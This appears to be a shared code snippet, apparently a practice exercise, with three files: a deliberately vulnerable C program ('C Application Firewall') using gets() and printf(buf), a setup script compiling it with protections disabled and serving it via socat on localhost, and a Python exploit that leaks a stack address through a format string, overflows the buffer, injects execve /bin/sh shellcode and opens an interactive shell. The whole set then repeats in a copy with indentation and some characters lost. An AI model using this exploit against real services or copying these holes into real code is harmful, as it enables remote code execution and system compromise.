spiarh · August 29, 2022 19:07
diff --git a/asd.py b/asd.py
 import struct
 import socket

 s = socket.socket()
 s.connect(('127.0.0.1', 1337))
 r = s.recv(1024)
 s.send("%p,%p,%p\n")
 while ',' not in r:
    r = s.recv(1024)
 start_buf = int(r.split(',')[1], 16)-9
 print("leaked start of buffer: 0x{:08x}".format(start_buf))

 raw_input('EXPLOIT?')
 padding = "dsuhagf ujkagsefjkygvasbjyfgvebaysufgvbeuaysbfvgajsyvbgjasyvbgfjkaysegvbfyjavbgfeyabvfgjyabvfyjagbvfyavbkjfeygvbaekjfygbvayesjgvbkajefvygbaejkyfgbaesyjbxreayksfugaskhjfedukasjfheasgv,ekirfaklsfgskaeifygdahs,fkjeuaskl.ejgfsajhfetgvasbkjfghevbafyutdlsfaekifgbsajkdua"

 #shellcode = "\xcc"*64
 shellcode = "\x90\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
 RIP = struct.pack("Q", (start_buf+len(padding)+8)+10)
 payload = padding + RIP + "\x90"*64 + shellcode
 s.send(payload)

 from telnetlib import Telnet
 t = Telnet()
 t.sock = s
 t.interact()
 s.close()
diff --git a/caf.c b/caf.c
 #include <stdio.h>
 #include <stdlib.h>

 void C_Application_Firewall(char* in_buf){
    for(char c = *in_buf++; c != '\x00'; c = *in_buf++) {
        if(c=='A') {
            printf("You have been blocked!\n");
            printf("Your IP has been reported to the authorities.\n");
            exit(-1);
        }
    }
 }

 void CAFtest() {
    char buf[256] = {0};
    printf("\nC Application Firewall Test - please try a payload:\n");
    gets(buf);
    C_Application_Firewall(buf);
    printf(buf);
 }

 int main(int argc, char* argv[]) {
    while(1) {
        CAFtest();
    }
 }
diff --git a/setup.sh b/setup.sh
 # compile the caf program
 gcc caf.c -o caf -fno-stack-protector -z execstack -no-pie

 # launch server to connect to 
 # connect with: nc 127.0.0.1 1337
 sudo socat TCP-LISTEN:1337,nodelay,reuseaddr,fork EXEC:"stdbuf -i0 -o0 -e0 ./caf"
	import struct
	import socket

	s = socket.socket()
	s.connect(('127.0.0.1', 1337))
	r = s.recv(1024)
	s.send("%p,%p,%p\n")
	while ',' not in r:
	r = s.recv(1024)
	start_buf = int(r.split(',')[1], 16)-9
	print("leaked start of buffer: 0x{:08x}".format(start_buf))

	raw_input('EXPLOIT?')
	padding = "dsuhagf ujkagsefjkygvasbjyfgvebaysufgvbeuaysbfvgajsyvbgjasyvbgfjkaysegvbfyjavbgfeyabvfgjyabvfyjagbvfyavbkjfeygvbaekjfygbvayesjgvbkajefvygbaejkyfgbaesyjbxreayksfugaskhjfedukasjfheasgv,ekirfaklsfgskaeifygdahs,fkjeuaskl.ejgfsajhfetgvasbkjfghevbafyutdlsfaekifgbsajkdua"

	#shellcode = "\xcc"*64
	shellcode = "\x90\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
	RIP = struct.pack("Q", (start_buf+len(padding)+8)+10)
	payload = padding + RIP + "\x90"*64 + shellcode
	s.send(payload)

	from telnetlib import Telnet
	t = Telnet()
	t.sock = s
	t.interact()
	s.close()
	#include <stdio.h>
	#include <stdlib.h>

	void C_Application_Firewall(char* in_buf){
	for(char c = in_buf++; c != '\x00'; c = in_buf++) {
	if(c=='A') {
	printf("You have been blocked!\n");
	printf("Your IP has been reported to the authorities.\n");
	exit(-1);
	}
	}
	}

	void CAFtest() {
	char buf[256] = {0};
	printf("\nC Application Firewall Test - please try a payload:\n");
	gets(buf);
	C_Application_Firewall(buf);
	printf(buf);
	}

	int main(int argc, char* argv[]) {
	while(1) {
	CAFtest();
	}
	}
	# compile the caf program
	gcc caf.c -o caf -fno-stack-protector -z execstack -no-pie

	# launch server to connect to
	# connect with: nc 127.0.0.1 1337
	sudo socat TCP-LISTEN:1337,nodelay,reuseaddr,fork EXEC:"stdbuf -i0 -o0 -e0 ./caf"